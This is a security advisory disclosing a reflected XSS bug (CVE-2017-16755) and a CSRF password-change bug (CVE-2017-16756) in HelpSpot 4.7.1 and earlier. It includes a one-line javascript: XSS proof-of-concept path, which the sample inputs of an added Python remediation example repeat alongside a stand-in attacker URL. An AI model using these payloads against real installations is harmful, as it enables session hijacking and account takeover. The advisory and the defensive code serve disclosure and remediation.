Our 90 day responsible disclosure period has passed as of today (February 6th, 2018), so we are ready to release the public disclosures for bugs CVE-2017-16755/CVE-2017-16756.

CVE-2017-16755
Class: Cross-Site Scripting (Reflected)
Vendor: Userscape
Product: HelpSpot <= 4.7.1
Remote: Yes
Credit: Ruby Nealon, Olivier Beg
Exploit Info: A reflected cross-site scripting vulnerability exists in the "return" parameter of the "index.php?pg=moderated" endpoint on HelpSpot installations below version 4.7.2. The parameter is placed unvalidated into the return link, so the payload executes when that link is clicked.
Proof of Concept: Access the following path on a vulnerable endpoint:
/index.php?pg=moderated&return=javascript:alert`1`
Solution: The vulnerability is patched in HelpSpot versions 4.7.2 and above.

CVE-2017-16756
Class: Cross-Site Request Forgery
Vendor: Userscape
Product: HelpSpot <= 4.7.1
Remote: Yes
Credit: Ruby Nealon, Olivier Beg
Exploit Info: A cross-site request forgery vulnerability exists on POST requests to the "index.php?pg=password.change" endpoint on HelpSpot installations below version 4.7.2. This allows an attacker to change the password of another user's HelpSpot account.
Proof of Concept: The following HTML proof of concept demonstrates this attack by changing the user's password to "CVE201716755POC":
Solution: The vulnerability is patched in HelpSpot versions 4.7.2 and above.
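The two bugs above share a common remediation shape: the "return" parameter must be validated as a same-site path before it is emitted as a link (rejecting any URL scheme, including javascript:, and any host), and the password.change POST must be bound to a per-session anti-CSRF token checked in constant time. The following Python is an added illustration of both checks written for this advisory; it is not HelpSpot's code, not the vendor's 4.7.2 fix, and the function names, the session/form dictionaries and the sample user record are assumptions made up for the example.

```python
import hmac
import html
import secrets
from urllib.parse import urlsplit


# ---------- CVE-2017-16755: validating a "return" parameter ----------

def is_safe_return_target(value):
    """Accept only an absolute, same-site path such as "/index.php?pg=moderated".

    Anything with a scheme (javascript:, data:, http:), a host (//evil.example),
    a backslash (browsers treat it as a slash) or a control character is rejected.
    """
    if not isinstance(value, str) or not value or len(value) > 2048:
        return False
    # Control characters (tab, newline, NUL) are stripped by some parsers and
    # browsers, which is how "java\tscript:" sneaks past naive prefix checks.
    if any(ord(c) < 0x20 or c == "\\" for c in value):
        return False
    parts = urlsplit(value.strip())
    if parts.scheme or parts.netloc:
        return False
    if not parts.path.startswith("/") or parts.path.startswith("//"):
        return False
    return True


def safe_return_href(value, default="/"):
    """Return an HTML-attribute-safe href: the validated path, else the default.

    Validation alone does not replace output encoding, so the result is still
    escaped for use inside a quoted href attribute.
    """
    target = value if is_safe_return_target(value) else default
    return html.escape(target, quote=True)


# ---------- CVE-2017-16756: binding password changes to a session token ----------

def issue_csrf_token():
    """Generate a fresh per-session token; store it server-side in the session."""
    return secrets.token_urlsafe(32)


def verify_csrf_token(session_token, submitted_token):
    """Constant-time comparison of the session token and the form's copy."""
    if not session_token or not submitted_token:
        return False
    if not isinstance(session_token, str) or not isinstance(submitted_token, str):
        return False
    return hmac.compare_digest(session_token.encode(), submitted_token.encode())


def handle_password_change(session, form, check_current_password):
    """Model of a hardened password.change handler (assumed request shape).

    session: dict with "csrf_token" and "user_id" (constructed for the example)
    form:    dict with "_token", "current_password", "new_password"
    check_current_password: callable(user_id, password) -> bool, supplied by caller
    Returns (http_status, outcome). A cross-site POST has no way to read the
    session-bound token, so it fails at the first check; re-authentication
    with the current password is defence in depth on top of that.
    """
    if not verify_csrf_token(session.get("csrf_token"), form.get("_token")):
        return 403, "csrf_failed"
    if not check_current_password(session.get("user_id"), form.get("current_password", "")):
        return 403, "reauth_failed"
    new_password = form.get("new_password", "")
    if len(new_password) < 12:
        return 400, "password_too_short"
    return 200, "password_changed"


if __name__ == "__main__":
    # Constructed sample inputs mirroring the advisory's two endpoints.
    for candidate in ["/index.php?pg=moderated", "javascript:alert`1`", "//attacker.example/"]:
        print(repr(candidate), "->", safe_return_href(candidate))

    token = issue_csrf_token()
    session = {"csrf_token": token, "user_id": 7}
    users = {7: "old-password-here"}   # constructed in-memory credential store
    check = lambda uid, pw: users.get(uid) == pw
    forged = {"_token": "", "current_password": "", "new_password": "CVE201716755POC"}
    genuine = {"_token": token, "current_password": "old-password-here",
               "new_password": "a-much-longer-password"}
    print("forged POST  ->", handle_password_change(session, forged, check))
    print("genuine POST ->", handle_password_change(session, genuine, check))
```

The redirect check deliberately rejects relative paths without a leading slash and protocol-relative URLs rather than trying to enumerate bad schemes, and the CSRF check must be paired with a SameSite cookie attribute and a token that is regenerated on login to be effective.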